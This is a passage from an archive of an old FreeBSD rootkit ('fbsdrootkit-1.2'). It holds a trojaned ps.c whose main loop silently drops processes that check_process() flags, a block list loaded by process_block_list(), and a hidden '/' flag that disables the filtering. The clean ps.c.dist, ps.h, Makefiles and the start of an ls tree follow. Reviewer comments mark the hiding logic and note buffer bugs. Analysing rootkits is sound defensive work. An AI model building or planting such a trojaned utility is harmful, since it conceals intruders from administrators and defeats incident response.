			parsefmt(o2);
			o1[0] = o2[0] = '\0';
			fmt = 1;
			break;
		case 'o':
			parsefmt(optarg);
			fmt = 1;
			break;
		case 'p':
			/* NOTE(review): atol() gives no way to detect a non-numeric argument */
			pid = atol(optarg);
			xflg = 1;
			break;
		case 'r':
			sortby = SORTCPU;
			break;
		case 'S':
			sumrusage = 1;
			break;
		case 'T':
			if ((optarg = ttyname(STDIN_FILENO)) == NULL)
				errx(1, "stdin: not a terminal");
			/* FALLTHROUGH */
		case 't': {
			struct stat sb;
			char *ttypath, pathbuf[MAXPATHLEN];

			if (strcmp(optarg, "co") == 0)
				ttypath = _PATH_CONSOLE;
			else if (*optarg != '/')
				(void)snprintf(ttypath = pathbuf,
				    sizeof(pathbuf), "%s%s", _PATH_TTY, optarg);
			else
				ttypath = optarg;
			if (stat(ttypath, &sb) == -1)
				err(1, "%s", ttypath);
			if (!S_ISCHR(sb.st_mode))
				errx(1, "%s: not a terminal", ttypath);
			ttydev = sb.st_rdev;
			break;
		}
		case 'U':
			pwd = getpwnam(optarg);
			if (pwd == NULL)
				errx(1, "%s: no such user", optarg);
			uid = pwd->pw_uid;
			endpwent();
			xflg++;		/* XXX: intuitive? */
			break;
		case 'u':
			parsefmt(ufmt);
			sortby = SORTCPU;
			fmt = 1;
			ufmt[0] = '\0';
			break;
		case 'v':
			parsefmt(vfmt);
			sortby = SORTMEM;
			fmt = 1;
			vfmt[0] = '\0';
			break;
		case 'W':
			swapf = optarg;
			break;
		case 'w':
			if (wflag)
				termwidth = UNLIMITED;
			else if (termwidth < 131)
				termwidth = 131;
			wflag++;
			break;
		case 'x':
			xflg = 1;
			break;
		/*
		 * Show all processes if the capability is enabled
		 *
		 * A non-zero show_all skips both process_block_list() and
		 * the check_process() test further down, so the listing is
		 * then unfiltered. For an analyst, the '/' in the option
		 * string above is one visible difference from ps.c.dist.
		 */
#if defined(SHOWFLAG)
		case '/':
			show_all++;
			break;
#endif
		case '?':
		default:
			usage();
		}
	argc -= optind;
	argv += optind;

#define	BACKWARD_COMPATIBILITY
#ifdef	BACKWARD_COMPATIBILITY
	/* old-style positional arguments: namelist, then core, then swap */
	if (*argv) {
		nlistf = *argv;
		if (*++argv) {
			memf = *argv;
			if (*++argv)
				swapf = *argv;
		}
	}
#endif
	/*
	 * Discard setgid privileges if not the running kernel so that bad
	 * guys can't print interesting stuff from kernel memory.
	 */
	/* NOTE(review): the setgid() return value is not checked */
	if (nlistf != NULL || memf != NULL || swapf != NULL)
		setgid(getgid());

	kd = kvm_openfiles(nlistf, memf, swapf, O_RDONLY, errbuf);
	if (kd == 0)
		errx(1, "%s", errbuf);

	if (!fmt)
		parsefmt(dfmt);

	/* XXX - should be cleaner */
	if (!all && ttydev == NODEV && pid == -1 && uid == (uid_t)-1)
		uid = getuid();

	/*
	 * scan requested variables, noting what structures are needed,
	 * and adjusting header widths as appropriate.
	 */
	scanvars();
	/*
	 * get proc list
	 */
	if (uid != (uid_t) -1) {
		what = KERN_PROC_UID;
		flag = uid;
	} else if (ttydev != NODEV) {
		what = KERN_PROC_TTY;
		flag = ttydev;
	} else if (pid != -1) {
		what = KERN_PROC_PID;
		flag = pid;
	} else {
		what = KERN_PROC_ALL;
		flag = 0;
	}
	/*
	 * select procs
	 */

	/*
	 * Read in a list of processes to block
	 *
	 * NOTE(review): process_block_list() is not defined in this file,
	 * so where the list is read from cannot be told from here. The
	 * call does not exist in ps.c.dist.
	 */
	if(!show_all)
		process_block_list();

	if ((kp = kvm_getprocs(kd, what, flag, &nentries)) == 0)
		errx(1, "%s", kvm_geterr(kd));
	if ((kinfo = malloc(nentries * sizeof(*kinfo))) == NULL)
		err(1, NULL);
	/* kinfo[] is filled from the last slot down while kp walks forward */
	for (i = nentries; --i >= 0; ++kp) {
		kinfo[i].ki_p = kp;
		if (needuser)
			saveuser(&kinfo[i]);
	}
	/*
	 * print header
	 */
	printheader();
	if (nentries == 0)
		exit(0);
	/*
	 * sort proc list
	 */
	qsort(kinfo, nentries, sizeof(KINFO), pscomp);
	/*
	 * for each proc, call each variable output function.
	 */
	for (i = lineno = 0; i < nentries; i++) {
		/*
		 * Check whether process should be blocked
		 *
		 * A row is dropped before any column is printed whenever
		 * check_process() returns non-zero; nothing is reported
		 * and the header row is unchanged. During incident
		 * response the process table has to be read with an
		 * independently obtained, verified ps instead.
		 */
		if(!show_all && check_process(kinfo[i].ki_p))
			continue;

		if (xflg == 0 && (KI_EPROC(&kinfo[i])->e_tdev == NODEV ||
		    (KI_PROC(&kinfo[i])->p_flag & P_CONTROLT ) == 0))
			continue;
		for (vent = vhead; vent; vent = vent->next) {
			(vent->var->oproc)(&kinfo[i], vent);
			if (vent->next != NULL)
				(void)putchar(' ');
		}
		(void)putchar('\n');
		if (prtheader && lineno++ == prtheader - 4) {
			(void)putchar('\n');
			printheader();
			lineno = 0;
		}
	}
	exit(eval);
}

/*
 * Walk the selected columns: widen each to at least its header length,
 * accumulate totwidth (one separating space per column, minus the last),
 * and record whether any column needs the user structure (USER) or the
 * argument strings (COMM).
 */
static void
scanvars()
{
	struct varent *vent;
	VAR *v;
	int i;

	for (vent = vhead; vent; vent = vent->next) {
		v = vent->var;
		i = strlen(v->header);
		if (v->width < i)
			v->width = i;
		totwidth += v->width + 1;	/* +1 for space */
		if (v->flag & USER)
			needuser = 1;
		if (v->flag & COMM)
			needcomm = 1;
	}
	totwidth--;
}

/*
 * Call fn (kvm_getargv or kvm_getenvv in this file) for the process and
 * pass its result to fmt_argv(); a NULL result ends the program.
 */
static char *
fmt(fn, ki, comm, maxlen)
	char **(*fn) __P((kvm_t *, const struct kinfo_proc *, int));
	KINFO *ki;
	char *comm;
	int maxlen;
{
	char *s;

	if ((s =
	    fmt_argv((*fn)(kd, ki->ki_p, termwidth), comm, maxlen)) == NULL)
		err(1, NULL);
	return (s);
}

/*
 * Fill in ki->ki_u from the process's pstats (read with kvm_uread) and
 * save the argument and environment strings when they are needed.
 * u_valid records whether the pstats read returned the full structure.
 */
static void
saveuser(ki)
	KINFO *ki;
{
	struct pstats pstats;
	struct usave *usp;
	struct user *u_addr = (struct user *)USRSTACK;

	usp = &ki->ki_u;
	if (kvm_uread(kd, KI_PROC(ki), (unsigned long)&u_addr->u_stats,
	    (char *)&pstats, sizeof(pstats)) == sizeof(pstats)) {
		/*
		 * The u-area might be swapped out, and we can't get
		 * at it because we have a crashdump and no swap.
		 * If it's here fill in these fields, otherwise, just
		 * leave them 0.
		 */
		usp->u_start = pstats.p_start;
		usp->u_ru = pstats.p_ru;
		usp->u_cru = pstats.p_cru;
		usp->u_valid = 1;
	} else
		usp->u_valid = 0;
	/*
	 * save arguments if needed
	 */
	if (needcomm)
		ki->ki_args = fmt(kvm_getargv, ki, KI_PROC(ki)->p_comm,
		    MAXCOMLEN);
	else
		ki->ki_args = NULL;
	if (needenv)
		ki->ki_env = fmt(kvm_getenvv, ki, (char *)NULL, 0);
	else
		ki->ki_env = NULL;
}

/*
 * qsort() comparator over KINFO entries: descending CPU percentage for
 * SORTCPU, descending virtual size for SORTMEM, otherwise ascending
 * terminal device and then ascending pid.
 *
 * NOTE(review): for SORTCPU the difference of two doubles is converted
 * to the int return type, so entries whose percentages differ by less
 * than 1 compare as equal.
 */
static int
pscomp(a, b)
	const void *a, *b;
{
	int i;
#ifdef NEWVM
#define VSIZE(k) (KI_EPROC(k)->e_vm.vm_dsize + KI_EPROC(k)->e_vm.vm_ssize + \
		  KI_EPROC(k)->e_vm.vm_tsize)
#else
#define VSIZE(k) ((k)->ki_p->p_dsize + (k)->ki_p->p_ssize + (k)->ki_e->e_xsize)
#endif

	if (sortby == SORTCPU)
		return (getpcpu((KINFO *)b) - getpcpu((KINFO *)a));
	if (sortby == SORTMEM)
		return (VSIZE((KINFO *)b) - VSIZE((KINFO *)a));
	i =  KI_EPROC((KINFO *)a)->e_tdev - KI_EPROC((KINFO *)b)->e_tdev;
	if (i == 0)
		i = KI_PROC((KINFO *)a)->p_pid - KI_PROC((KINFO *)b)->p_pid;
	return (i);
}

/*
 * ICK (all for getopt), would rather hide the ugliness
 * here than taint the main code.
 *
 * ps foo -> ps -foo
 * ps 34 -> ps -p34
 *
 * The old convention that 't' with no trailing tty arg means the users
 * tty, is only supported if argv[1] doesn't begin with a '-'. This same
 * feature is available with the option 'T', which takes no argument.
*/
/*
 * Returns a newly allocated, rewritten copy of s; the caller (main)
 * stores it in argv[1] and never frees it. s itself may be modified in
 * place (a trailing 't' becomes 'T').
 *
 * NOTE(review): the buffer is len + 2 bytes, but when s neither starts
 * with '-' nor carries a 'p'/'t' before its trailing number, the output
 * is '-' + 'p' + the len original bytes + NUL, i.e. len + 3 bytes
 * ("34" becomes "-p34"), one more than allocated.
 *
 * NOTE(review): for an empty s, cp = s + len - 1 points one byte before
 * the string and is then dereferenced. isdigit() is also called on a
 * plain char.
 */
static char *
kludge_oldps_options(s)
	char *s;
{
	size_t len;
	char *newopts, *ns, *cp;

	len = strlen(s);
	if ((newopts = ns = malloc(len + 2)) == NULL)
		err(1, NULL);
	/*
	 * options begin with '-'
	 */
	if (*s != '-')
		*ns++ = '-';	/* add option flag */
	/*
	 * gaze to end of argv[1]
	 */
	cp = s + len - 1;
	/*
	 * if last letter is a 't' flag with no argument (in the context
	 * of the oldps options -- option string NOT starting with a '-' --
	 * then convert to 'T' (meaning *this* terminal, i.e. ttyname(0)).
	 */
	if (*cp == 't' && *s != '-')
		*cp = 'T';
	else {
		/*
		 * otherwise check for trailing number, which *may* be a
		 * pid.
		 */
		while (cp >= s && isdigit(*cp))
			--cp;
	}
	cp++;
	memmove(ns, s, (size_t)(cp - s));	/* copy up to trailing number */
	ns += cp - s;
	/*
	 * if there's a trailing number, and not a preceding 'p' (pid) or
	 * 't' (tty) flag, then assume it's a pid and insert a 'p' flag.
	 */
	if (isdigit(*cp) && (cp == s || (cp[-1] != 't' && cp[-1] != 'p')) &&
	    (cp - 1 == s || cp[-2] != 't'))
		*ns++ = 'p';
	(void)strcpy(ns, cp);		/* and append the number */

	return (newopts);
}

/*
 * Print the usage text to stderr and exit with status 1. The text does
 * not list the '/' option that main() accepts when SHOWFLAG is defined.
 */
static void
usage()
{

	(void)fprintf(stderr,
	    "usage:\t%s\n\t %s\n\t%s\n",
	    "ps [-aChjlmrSTuvwx] [-O|o fmt] [-p pid] [-t tty] [-U user]",
	    "[-M core] [-N system] [-W swap]",
	    "ps [-L]");
	exit(1);
}
fbsdrootkit-1.2/ps/ps.h100600 764 764 6522 5640731120 12353 0ustar dfdf/*-
 * Copyright (c) 1990, 1993
 * The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3.
All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)ps.h 8.1 (Berkeley) 5/31/93 * $Id: ps.h,v 1.2 1994/09/24 02:56:48 davidg Exp $ */ #define UNLIMITED 0 /* unlimited terminal width */ enum type { CHAR, UCHAR, SHORT, USHORT, LONG, ULONG, KPTR }; struct usave { struct timeval u_start; struct rusage u_ru; struct rusage u_cru; char u_acflag; char u_valid; }; #define KI_PROC(ki) (&(ki)->ki_p->kp_proc) #define KI_EPROC(ki) (&(ki)->ki_p->kp_eproc) typedef struct kinfo { struct kinfo_proc *ki_p; /* proc structure */ struct usave ki_u; /* interesting parts of user */ char *ki_args; /* exec args */ char *ki_env; /* environment */ } KINFO; /* Variables. 
*/ typedef struct varent { struct varent *next; struct var *var; } VARENT; typedef struct var { char *name; /* name(s) of variable */ char *header; /* default header */ char *alias; /* aliases */ #define COMM 0x01 /* needs exec arguments and environment (XXX) */ #define LJUST 0x02 /* left adjust on output (trailing blanks) */ #define USER 0x04 /* needs user structure */ u_int flag; /* output routine */ void (*oproc) __P((struct kinfo *, struct varent *)); short width; /* printing width */ /* * The following (optional) elements are hooks for passing information * to the generic output routines: pvar, evar, uvar (those which print * simple elements from well known structures: proc, eproc, usave) */ int off; /* offset in structure */ enum type type; /* type of element */ char *fmt; /* printf format */ char *time; /* time format */ /* * glue to link selected fields together */ } VAR; #include "extern.h" fbsdrootkit-1.2/ps/ps.c.dist100600 764 764 30133 6251656647 13346 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. 
Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: ps.c,v 1.7.4.3 1996/06/05 02:36:12 jkh Exp $ */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1990, 1993, 1994\n\ The Regents of the University of California. 
All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)ps.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "ps.h" #ifdef P_PPWAIT #define NEWVM #endif KINFO *kinfo; struct varent *vhead, *vtail; int eval; /* exit value */ int rawcpu; /* -C */ int sumrusage; /* -S */ int termwidth; /* width of screen (0 == infinity) */ int totwidth; /* calculated width of requested variables */ static int needuser, needcomm, needenv; enum sort { DEFAULT, SORTMEM, SORTCPU } sortby = DEFAULT; static char *fmt __P((char **(*)(kvm_t *, const struct kinfo_proc *, int), KINFO *, char *, int)); static char *kludge_oldps_options __P((char *)); static int pscomp __P((const void *, const void *)); static void saveuser __P((KINFO *)); static void scanvars __P((void)); static void usage __P((void)); char dfmt[] = "pid tt state time command"; char jfmt[] = "user pid ppid pgid sess jobc state tt time command"; char lfmt[] = "uid pid ppid cpu pri nice vsz rss wchan state tt time command"; char o1[] = "pid"; char o2[] = "tt state time command"; char ufmt[] = "user pid %cpu %mem vsz rss tt state start time command"; char vfmt[] = "pid state time sl re pagein vsz rss lim tsiz %cpu %mem command"; kvm_t *kd; int main(argc, argv) int argc; char *argv[]; { struct kinfo_proc *kp; struct varent *vent; struct winsize ws; struct passwd *pwd; dev_t ttydev; pid_t pid; uid_t uid; int all, ch, flag, i, fmt, lineno, nentries; int prtheader, wflag, what, xflg; char *nlistf, *memf, *swapf, errbuf[256]; if ((ioctl(STDOUT_FILENO, TIOCGWINSZ, (char *)&ws) == -1 && ioctl(STDERR_FILENO, TIOCGWINSZ, (char *)&ws) == -1 && ioctl(STDIN_FILENO, TIOCGWINSZ, (char *)&ws) == -1) || ws.ws_col == 0) termwidth = 79; else termwidth = ws.ws_col - 1; if (argc > 1) argv[1] = kludge_oldps_options(argv[1]); all = fmt = 
prtheader = wflag = xflg = 0; pid = -1; uid = (uid_t) -1; ttydev = NODEV; memf = nlistf = swapf = NULL; while ((ch = getopt(argc, argv, "aCeghjLlM:mN:O:o:p:rSTt:U:uvW:wx")) != EOF) switch((char)ch) { case 'a': all = 1; break; case 'e': /* XXX set ufmt */ needenv = 1; break; case 'C': rawcpu = 1; break; case 'g': break; /* no-op */ case 'h': prtheader = ws.ws_row > 5 ? ws.ws_row : 22; break; case 'j': parsefmt(jfmt); fmt = 1; jfmt[0] = '\0'; break; case 'L': showkey(); exit(0); case 'l': parsefmt(lfmt); fmt = 1; lfmt[0] = '\0'; break; case 'M': memf = optarg; break; case 'm': sortby = SORTMEM; break; case 'N': nlistf = optarg; break; case 'O': parsefmt(o1); parsefmt(optarg); parsefmt(o2); o1[0] = o2[0] = '\0'; fmt = 1; break; case 'o': parsefmt(optarg); fmt = 1; break; case 'p': pid = atol(optarg); xflg = 1; break; case 'r': sortby = SORTCPU; break; case 'S': sumrusage = 1; break; case 'T': if ((optarg = ttyname(STDIN_FILENO)) == NULL) errx(1, "stdin: not a terminal"); /* FALLTHROUGH */ case 't': { struct stat sb; char *ttypath, pathbuf[MAXPATHLEN]; if (strcmp(optarg, "co") == 0) ttypath = _PATH_CONSOLE; else if (*optarg != '/') (void)snprintf(ttypath = pathbuf, sizeof(pathbuf), "%s%s", _PATH_TTY, optarg); else ttypath = optarg; if (stat(ttypath, &sb) == -1) err(1, "%s", ttypath); if (!S_ISCHR(sb.st_mode)) errx(1, "%s: not a terminal", ttypath); ttydev = sb.st_rdev; break; } case 'U': pwd = getpwnam(optarg); if (pwd == NULL) errx(1, "%s: no such user", optarg); uid = pwd->pw_uid; endpwent(); xflg++; /* XXX: intuitive? 
*/ break; case 'u': parsefmt(ufmt); sortby = SORTCPU; fmt = 1; ufmt[0] = '\0'; break; case 'v': parsefmt(vfmt); sortby = SORTMEM; fmt = 1; vfmt[0] = '\0'; break; case 'W': swapf = optarg; break; case 'w': if (wflag) termwidth = UNLIMITED; else if (termwidth < 131) termwidth = 131; wflag++; break; case 'x': xflg = 1; break; case '?': default: usage(); } argc -= optind; argv += optind; #define BACKWARD_COMPATIBILITY #ifdef BACKWARD_COMPATIBILITY if (*argv) { nlistf = *argv; if (*++argv) { memf = *argv; if (*++argv) swapf = *argv; } } #endif /* * Discard setgid privileges if not the running kernel so that bad * guys can't print interesting stuff from kernel memory. */ if (nlistf != NULL || memf != NULL || swapf != NULL) setgid(getgid()); kd = kvm_openfiles(nlistf, memf, swapf, O_RDONLY, errbuf); if (kd == 0) errx(1, "%s", errbuf); if (!fmt) parsefmt(dfmt); /* XXX - should be cleaner */ if (!all && ttydev == NODEV && pid == -1 && uid == (uid_t)-1) uid = getuid(); /* * scan requested variables, noting what structures are needed, * and adjusting header widths as appropiate. */ scanvars(); /* * get proc list */ if (uid != (uid_t) -1) { what = KERN_PROC_UID; flag = uid; } else if (ttydev != NODEV) { what = KERN_PROC_TTY; flag = ttydev; } else if (pid != -1) { what = KERN_PROC_PID; flag = pid; } else { what = KERN_PROC_ALL; flag = 0; } /* * select procs */ if ((kp = kvm_getprocs(kd, what, flag, &nentries)) == 0) errx(1, "%s", kvm_geterr(kd)); if ((kinfo = malloc(nentries * sizeof(*kinfo))) == NULL) err(1, NULL); for (i = nentries; --i >= 0; ++kp) { kinfo[i].ki_p = kp; if (needuser) saveuser(&kinfo[i]); } /* * print header */ printheader(); if (nentries == 0) exit(0); /* * sort proc list */ qsort(kinfo, nentries, sizeof(KINFO), pscomp); /* * for each proc, call each variable output function. 
*/ for (i = lineno = 0; i < nentries; i++) { if (xflg == 0 && (KI_EPROC(&kinfo[i])->e_tdev == NODEV || (KI_PROC(&kinfo[i])->p_flag & P_CONTROLT ) == 0)) continue; for (vent = vhead; vent; vent = vent->next) { (vent->var->oproc)(&kinfo[i], vent); if (vent->next != NULL) (void)putchar(' '); } (void)putchar('\n'); if (prtheader && lineno++ == prtheader - 4) { (void)putchar('\n'); printheader(); lineno = 0; } } exit(eval); }

/*
 * scanvars --
 *	Walk the varent list that starts at vhead.  Every column is widened
 *	to at least the length of its header, the widths plus one separator
 *	each are summed into totwidth, and needuser / needcomm are set when
 *	a column carries the USER or COMM flag.
 */
static void
scanvars()
{
	struct varent *vent;
	VAR *v;
	int i;

	for (vent = vhead; vent; vent = vent->next) {
		v = vent->var;
		i = strlen(v->header);
		if (v->width < i)
			v->width = i;
		totwidth += v->width + 1;	/* +1 for space */
		if (v->flag & USER)
			needuser = 1;
		if (v->flag & COMM)
			needcomm = 1;
	}
	/* One separator was counted per column; drop the one after the last. */
	totwidth--;
}

/*
 * fmt --
 *	Call fn on the process behind ki (saveuser() passes kvm_getargv or
 *	kvm_getenvv), hand the returned vector to fmt_argv() together with
 *	comm and maxlen, and return the string fmt_argv() builds.
 *
 *	Exits through err() when fmt_argv() returns NULL.  Who frees the
 *	returned string is not visible in this listing.
 */
static char *
fmt(fn, ki, comm, maxlen)
	char **(*fn) __P((kvm_t *, const struct kinfo_proc *, int));
	KINFO *ki;
	char *comm;
	int maxlen;
{
	char *s;

	if ((s =
	    fmt_argv((*fn)(kd, ki->ki_p, termwidth), comm, maxlen)) == NULL)
		err(1, NULL);
	return (s);
}

/*
 * saveuser --
 *	Fill in the per-process extras of ki: the start time and resource
 *	usage read from the u-area through kvm_uread(), plus the formatted
 *	argument and environment strings when needcomm / needenv ask for
 *	them.  u_valid records whether the u-area read returned a full
 *	struct pstats.
 */
static void
saveuser(ki)
	KINFO *ki;
{
	struct pstats pstats;
	struct usave *usp;
	/* Used only to form the address of u_stats for the kvm_uread() call. */
	struct user *u_addr = (struct user *)USRSTACK;

	usp = &ki->ki_u;
	if (kvm_uread(kd, KI_PROC(ki), (unsigned long)&u_addr->u_stats,
	    (char *)&pstats, sizeof(pstats)) == sizeof(pstats)) {
		/*
		 * The u-area might be swapped out, and we can't get
		 * at it because we have a crashdump and no swap.
		 * If it's here fill in these fields, otherwise, just
		 * leave them 0.
		 */
		usp->u_start = pstats.p_start;
		usp->u_ru = pstats.p_ru;
		usp->u_cru = pstats.p_cru;
		usp->u_valid = 1;
	} else
		usp->u_valid = 0;
	/*
	 * save arguments if needed
	 */
	if (needcomm)
		ki->ki_args = fmt(kvm_getargv, ki, KI_PROC(ki)->p_comm,
		    MAXCOMLEN);
	else
		ki->ki_args = NULL;
	if (needenv)
		ki->ki_env = fmt(kvm_getenvv, ki, (char *)NULL, 0);
	else
		ki->ki_env = NULL;
}

/*
 * pscomp --
 *	Comparison callback over two KINFO records (passed as const void *).
 *	With sortby == SORTCPU the order is by getpcpu(), largest first;
 *	with SORTMEM by VSIZE(), largest first; otherwise by controlling
 *	terminal device and then by pid, both ascending.
 *
 *	NOTE(review): every branch returns a difference narrowed to int.
 *	If getpcpu() returns a floating-point value (its declaration is not
 *	in this listing) differences below 1 compare as equal, and a large
 *	VSIZE difference may not fit in an int -- confirm against the types.
 */
static int
pscomp(a, b)
	const void *a, *b;
{
	int i;
#ifdef NEWVM
#define VSIZE(k) (KI_EPROC(k)->e_vm.vm_dsize + KI_EPROC(k)->e_vm.vm_ssize + \
		  KI_EPROC(k)->e_vm.vm_tsize)
#else
#define VSIZE(k) ((k)->ki_p->p_dsize + (k)->ki_p->p_ssize + (k)->ki_e->e_xsize)
#endif

	if (sortby == SORTCPU)
		return (getpcpu((KINFO *)b) - getpcpu((KINFO *)a));
	if (sortby == SORTMEM)
		return (VSIZE((KINFO *)b) - VSIZE((KINFO *)a));
	i =  KI_EPROC((KINFO *)a)->e_tdev - KI_EPROC((KINFO *)b)->e_tdev;
	if (i == 0)
		i = KI_PROC((KINFO *)a)->p_pid - KI_PROC((KINFO *)b)->p_pid;
	return (i);
}

/*
 * ICK (all for getopt), would rather hide the ugliness
 * here than taint the main code.
 *
 *  ps foo -> ps -foo
 *  ps 34 -> ps -p34
 *
 * The old convention that 't' with no trailing tty arg means the users
 * tty, is only supported if argv[1] doesn't begin with a '-'.  This same
 * feature is available with the option 'T', which takes no argument.
 *
 * Returns a malloc()ed rewritten option string.  The input s is modified
 * in place when a trailing 't' is turned into 'T'.
 *
 * NOTE(review): the buffer holds len + 2 bytes, but the result can need
 * the inserted '-', all len input characters, the inserted 'p' and the
 * terminating NUL, i.e. len + 3 bytes ("34" becomes "-p34").  The
 * allocation is one byte short for that input and should be len + 3.
 *
 * NOTE(review): s comes straight from the command line.  For an empty s,
 * cp starts at s - 1 and is dereferenced; when the digit scan consumes
 * the whole string, the pid test below evaluates cp[-2] with cp == s.
 * Both read in front of the argument and need a bounds check.  isdigit()
 * is also handed a plain char.
 */
static char *
kludge_oldps_options(s)
	char *s;
{
	size_t len;
	char *newopts, *ns, *cp;

	len = strlen(s);
	if ((newopts = ns = malloc(len + 2)) == NULL)
		err(1, NULL);
	/*
	 * options begin with '-'
	 */
	if (*s != '-')
		*ns++ = '-';	/* add option flag */
	/*
	 * gaze to end of argv[1]
	 */
	cp = s + len - 1;
	/*
	 * if last letter is a 't' flag with no argument (in the context
	 * of the oldps options -- option string NOT starting with a '-' --
	 * then convert to 'T' (meaning *this* terminal, i.e. ttyname(0)).
	 */
	if (*cp == 't' && *s != '-')
		*cp = 'T';
	else {
		/*
		 * otherwise check for trailing number, which *may* be a
		 * pid.
		 */
		while (cp >= s && isdigit(*cp))
			--cp;
	}
	cp++;
	memmove(ns, s, (size_t)(cp - s));	/* copy up to trailing number */
	ns += cp - s;
	/*
	 * if there's a trailing number, and not a preceding 'p' (pid) or
	 * 't' (tty) flag, then assume it's a pid and insert a 'p' flag.
	 */
	if (isdigit(*cp) && (cp == s || (cp[-1] != 't' && cp[-1] != 'p')) &&
	    (cp - 1 == s || cp[-2] != 't'))
		*ns++ = 'p';
	(void)strcpy(ns, cp);		/* and append the number */

	return (newopts);
}

/*
 * usage --
 *	Print the ps synopsis on stderr and exit with status 1.
 */
static void
usage()
{

	(void)fprintf(stderr,
	    "usage:\t%s\n\t %s\n\t%s\n",
	    "ps [-aChjlmrSTuvwx] [-O|o fmt] [-p pid] [-t tty] [-U user]",
	    "[-M core] [-N system] [-W swap]",
	    "ps [-L]");
	exit(1);
}
fbsdrootkit-1.2/ps/Makefile.dist100600 764 764 400 6265032706 14137 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/2/93 # $Id: Makefile,v 1.5.4.2 1996/06/05 02:36:06 jkh Exp $ PROG= ps SRCS= fmt.c keyword.c nlist.c print.c ps.c CFLAGS+=-I/sys DPADD= ${LIBMATH} ${LIBKVM} LDADD= -lm -lkvm BINGRP= kmem BINMODE=2555 .include fbsdrootkit-1.2/ls/ 40700 764 764 0 6257406031 11455 5ustar dfdffbsdrootkit-1.2/ls/Makefile100600 764 764 273 6265015727 13205 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/2/93 # $Id: Makefile,v 1.2 1994/09/24 02:55:51 davidg Exp $ PROG= ls SRCS= cmp.c stat_flags.c ls.c print.c util.c CFLAGS+=-static .include fbsdrootkit-1.2/ls/cmp.c100600 764 764 5673 5640712470 12514 0ustar dfdf/* * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Michael Fischbein. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2.
Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 